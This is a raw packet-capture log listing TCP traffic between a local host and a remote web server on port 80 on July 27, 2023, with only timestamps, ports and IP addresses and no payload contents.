Jul 27, 2023 20:18:59.832043886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832082987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832110882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832143068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832180977 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832226992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832240105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832281113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832469940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832509995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832550049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832588911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832607985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832647085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832667112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832705021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832741976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832783937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.832793951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832823992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.832863092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834125996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834317923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834359884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834378958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.834419012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834459066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834528923 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.834528923 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.834691048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834731102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834769964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834789038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.834827900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834867954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834903955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.834923029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.834958076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.834975004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835014105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835055113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835095882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835107088 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.835134029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.835685015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835726023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835767031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835824013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835836887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.835864067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.835891962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835946083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.835990906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836045027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836061001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836087942 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836122990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836168051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836213112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836260080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836294889 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836342096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836361885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836406946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836455107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836498976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836519003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836559057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836581945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836627960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836673021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836715937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836739063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836781025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836802959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836848974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836894035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.836941004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.836960077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837002039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837023020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837065935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837090015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837133884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837178946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837197065 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837214947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837229967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837270975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837316036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837358952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837388992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837414026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837439060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837483883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837523937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837546110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837589979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837608099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837651968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837694883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837734938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837758064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837795019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837820053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837862968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837908030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.837946892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.837970972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.838009119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.838037014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.838083029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.838126898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.838169098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.838193893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.838232040 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.838258982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.838303089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.839057922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.850159883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.850272894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.854142904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.854432106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.854527950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.854609013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.854692936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.854732037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.854770899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.854808092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.854903936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855062008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855145931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855184078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.855206966 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.855254889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855334044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855406046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855465889 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.855500937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855559111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.855601072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.855684042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.856626034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.856673956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.856729031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.856744051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.856762886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857218027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857264042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857310057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857363939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857389927 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857428074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857474089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857558012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857609034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857621908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857647896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857683897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857729912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857770920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857814074 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857836008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857876062 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.857906103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.857952118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860584021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860630989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860662937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.860682964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.860719919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860766888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860814095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860868931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860882044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.860912085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.860944986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.860991001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861037016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861092091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861105919 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861139059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861169100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861213923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861258984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861313105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861332893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861362934 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861396074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861440897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861484051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861531019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861543894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861572981 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861605883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861650944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861695051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861743927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861758947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861788988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.861819029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861862898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861907959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861958981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.861975908 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862019062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862049103 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862076044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862102032 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862143040 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862164974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862210035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862252951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862274885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862308979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862340927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862385035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862406969 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862451077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862495899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862540960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862560034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862601042 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862624884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862670898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862713099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862761974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.862775087 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862802982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.862837076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.876970053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.877033949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.877156019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.877240896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.877289057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.877312899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.878030062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878077030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878123999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878145933 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.878176928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.878211975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878257990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878304005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878362894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.878909111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.878988981 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.879028082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.879111052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.879556894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.879633904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.879663944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.879719019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.880430937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.880516052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.880589008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.880656958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.880690098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.880742073 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.885921955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886007071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886086941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886111021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.886379004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886425018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886471987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886492014 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.886523008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.886554956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886603117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886651039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886698008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886718988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.886754036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.886782885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886828899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886876106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886919975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.886939049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.886970997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887001038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887044907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887094021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887137890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887156010 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887187958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887219906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887269020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887315035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887367010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887381077 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887409925 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887444973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887494087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887506962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887540102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887573004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887615919 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887634039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887676001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887698889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887743950 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887763023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887804985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887829065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887871981 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887890100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.887933016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.887955904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888000011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888044119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888067961 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888103962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888128996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888180971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888204098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888237953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888289928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888338089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888359070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888387918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888421059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888473034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888487101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888521910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888552904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888598919 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888616085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888659000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888680935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888727903 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.888745070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.888789892 CEST	49693	80	192.168.2.4	45.9.74.80
